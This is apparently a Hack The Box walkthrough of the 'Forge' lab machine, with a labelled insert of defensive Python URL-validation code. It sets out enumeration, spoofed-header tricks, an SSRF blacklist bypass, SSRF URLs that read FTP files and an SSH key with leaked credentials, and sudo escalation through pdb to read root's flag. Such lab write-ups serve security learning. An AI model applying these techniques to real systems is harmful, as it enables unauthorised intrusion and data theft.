HTB — Forge Walkthrough
--
Enumeration
Scan the Forge machine with nmap, using the command:
nmap -sV -sC {ip}
- -sV — service/version detection on open ports
- -sC — run the default script scan
As we can see, only ports 21, 22 and 80 are open:
- 21 — FTP
- 22 — SSH
- 80 — HTTP
Port 80 points to the http://forge.htb address, so add it to the /etc/hosts file.
Next, when we open http://forge.htb, we should be able to see the website.
Make a directory scan with FFUF:
ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://forge.htb/FUZZ
- -c — colored status codes
- -w — wordlist path
- -u — website address
After this, we will notice that the only interesting folder is the upload directory, where we can upload files either from our machine or from a website address (URL).
At this point we could try uploading a PHP reverse shell, or an image file containing a reverse shell in its metadata, but that attack vector does not work here. We should enumerate more…
Let's fuzz for virtual hosts (subdomains) with ffuf:
ffuf -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.forge.htb" -u http://forge.htb/ -fl 10
- -c — colored status codes
- -w — wordlist path
- -H — add a request header; here the Host header is fuzzed with each candidate subdomain
- -u — target address
- -fl — filter out responses with this number of lines (10, the size of the default response)
The result shows that there is an admin subdomain. Add it to the /etc/hosts file and open that address.
Unfortunately this page is allowed for localhost only. We can try Burp Suite to bypass the IP restriction with headers such as:
- X-Originating-IP: 127.0.0.1
- X-Forwarded-For: 127.0.0.1
- X-Remote-IP: 127.0.0.1
- X-Remote-Addr: 127.0.0.1
But it does not work. For more information open this LINK.
We will notice that we can upload files from a website address. Let's submit http://admin.forge.htb as the URL.
Here we go: we see that this address is blacklisted, so let's bypass this restriction.
Use an address like http://ADMIN.FORGE.HTB instead of http://admin.forge.htb.
We bypassed the restriction, but it is not what we expect, because the resulting address does not appear to contain anything.
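Why the case trick above works, as an added example that is not from this write-up or from the Forge box's own code: a constructed case-sensitive substring blacklist (the behaviour the page reports) next to a hardened check that parses the URL, normalises the host and uses an allow-list. The blacklist entries and the allowed host cdn.example.com are assumptions for the demonstration.

```python
from urllib.parse import urlparse
import ipaddress

# Constructed blacklist, assumed for the demo; the page only reports that
# admin.forge.htb is blocked while ADMIN.FORGE.HTB is accepted.
BLACKLIST = ["admin.forge.htb", "forge.htb", "localhost", "127.0.0.1"]


def weak_is_allowed(url: str) -> bool:
    """Case-sensitive substring match on the raw URL string.

    Uppercasing the host defeats it, and the scheme (ftp://, file://)
    is never checked at all.
    """
    return not any(bad in url for bad in BLACKLIST)


def hardened_is_allowed(url: str, allowed_hosts=("cdn.example.com",)) -> bool:
    """Parse the URL, normalise the host and compare against an allow-list."""
    try:
        parts = urlparse(url)
    except ValueError:
        return False
    # Only fetch over HTTP(S); this blocks ftp://, gopher://, file:// and friends.
    if parts.scheme not in ("http", "https"):
        return False
    # .hostname strips userinfo (user:pass@) and port and is already lowercased.
    host = (parts.hostname or "").rstrip(".")
    if not host:
        return False
    # Reject literal IP addresses outright (covers 127.0.0.1, ::1, 0x7f000001, ...).
    try:
        ipaddress.ip_address(host)
        return False
    except ValueError:
        pass
    # Exact allow-list match; a blacklist can never enumerate every alias.
    # A production fetcher should additionally resolve the name, refuse private
    # or loopback results, and not follow redirects to unchecked hosts.
    return host in allowed_hosts
```
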
At this point we should use curl to view the content of the resulting address.
As we can see, we are able to read the content of that address. Dig into the code and see that an /announcements folder is available, so submit http://ADMIN.FORGE.HTB/announcements to the upload form,
and again use curl to view the content of the resulting address.
Congratulations, we got FTP credentials: user:heightofsecurity123!
But the FTP port is filtered from the outside, which means that we can access it only from localhost. We have to reach it through the website instead: as mentioned in the code, the admin.forge.htb/upload endpoint has FTP and FTPS support, so we can use those credentials to make the server log in to FTP for us.
Submit http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB to the upload form.
Open the result with curl and we will be able to see user.txt in the listing.
To read user.txt, submit http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB/user.txt to the upload form and open the result via curl.
Congratulations, we got user.txt, but what about privilege escalation?
Privilege Escalation
First we need to gain access to the server via SSH. We can do it with the id_rsa key that is in the .ssh folder of the FTP account.
Submit http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@FORGE.HTB/.ssh/ to the upload form and then open the link via curl. The result should look like this:
At this point we can retrieve id_rsa and then log in with SSH, using the command:
ssh -i id_rsa user@forge.htb
We are in.
After running sudo -l (which lists the commands we are allowed to run with sudo) we will notice that we have sudo access to /opt/remote-manage.py.
Let's dig into the code.
Our goal is to drop the program into the pdb debugger module. For this we have to open a second SSH connection, run /usr/bin/python3 /opt/remote-manage.py with sudo in the first one, and then connect to it via nc from the second.
Run sudo /usr/bin/python3 /opt/remote-manage.py
Connect via nc from the other SSH connection and enter the password secretadminpassword, which is stored in remote-manage.py.
Note that in your case the port to connect to will be different.
Next we have to interrupt the program so that it drops into the pdb module: press CTRL+C on the nc side.
Then you will get the pdb debugging prompt on the first SSH connection.
After this we can run the command subprocess.run("cat /root/root.txt", shell=True) at the pdb prompt to get the content of root.txt.
Congratulations…